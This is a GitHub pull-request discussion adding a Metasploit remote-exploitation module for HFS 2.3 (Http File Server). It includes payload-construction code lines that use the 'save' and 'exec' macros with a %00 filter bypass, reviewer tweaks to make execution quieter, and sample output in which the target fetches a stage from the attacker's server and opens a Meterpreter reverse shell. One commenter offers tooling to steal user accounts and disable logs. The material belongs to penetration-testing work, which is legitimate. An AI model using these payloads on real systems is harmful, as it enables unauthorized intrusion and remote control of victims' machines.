-
Notifications
You must be signed in to change notification settings - Fork 14.3k
Http File Server Remote Command Exec #3793
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Conversation
…pting commands 'save' and 'exec'.
|
Awesome module, only problem is that it pops up a ton of wscript/cmd screens on the target. Is there any reason you went for a wget-like approach to the module instead of just piping the encoded VBS over directly? |
|
Here is another fun option: |
|
Did notice that when trying to use the 'append' operand, it would write the string 4 times to the file specified using the following: |
|
|
||
| payloads = [ | ||
| "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}", | ||
| "exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Change this line to:
"exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}"
And there won't be any more popups during execution (no need to start cmd.exe especially if you use the filename and extension)
bugtraq security list.
|
works perfectly, thanks mubix |
|
Made some updates to push a file instead of puling it: https://gist.github.com/mubix/b855d8045a6112a937a7 it's REALLY ugly, don't use it as gospel, but just another option. |
| 'uri' => '/' | ||
| }) | ||
|
|
||
| if res.headers['Server'] =~ /HFS 2.3/ |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The correct regex should be:
/HFS 2\.3/|
The CmdStager approach would be the most appropriate implementation. |
|
@wchen-r7 can't use the standard CmdStager because it issues every command 4 times and the greater-than seems like a bad character. (I haven't tried < yet) |
|
@mubix No, I mean your approach is correct. |
|
i tried the cmdstager option, i seem can't make it less noisy as popups flying over the screen. the code is here https://gist.github.com/mfadzilr/6b8fbc3ce9ee89623585, most of it taken from mubix approach. |
|
Hi i'm the author of this vulnerability if you need i can provide you my framework with full features like disable log , steal user account , and many more :) , contact me on gmail danielelinguaglossa@gmail.com |
|
Since it has been quiet for some days, and looks like there was new commits trying to address feedback I'm going to pick up it! If someone working on it, or interested on it, please warn here! :) Verification in progress in the meanwhile! |
|
Landed after some clean up, see final result here: 411f6c8 Test: Thanks @mfadzilr for the module, awesome work! |
|
great news, thank you very much |
Add "http_file_server_exec" remote exploitation module
Remote command execution bypass macro filters, using "%00" to bypass filters, 'save' and 'exec' macro command to create vbs file dan execute the vbs script on the target system. please note that when using "exec", it will execute 4 x times.
Notes
Tested on target host without antivirus installed.
Example Output
msf exploit(http_file_server_exec) > exploit
[] Exploit running as background job.
msf exploit(http_file_server_exec) >
[] Started reverse handler on 192.168.175.142:4444
[] Using URL: http://0.0.0.0:8080/791wKD
[] Local IP: http://192.168.175.142:8080/791wKD
[] Server started.
[] Sending a malicious request to /
[] 192.168.175.134 http_file_server_exec - 192.168.175.134:80 - Payload request received: /791wKD
[] Sending stage (769536 bytes) to 192.168.175.134
[] Meterpreter session 5 opened (192.168.175.142:4444 -> 192.168.175.134:1335) at 2014-09-20 18:05:48 +0800
[+] Deleted c:\test\VtdVFRGk.vbs
[] Server stopped.
msf exploit(http_file_server_exec) > sessions -i 5
[*] Starting interaction with 5...
meterpreter > shell
Process 2072 created.
Channel 2 created.
Microsoft Windows XP Version 5.1.2600 Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\pentest\Desktop>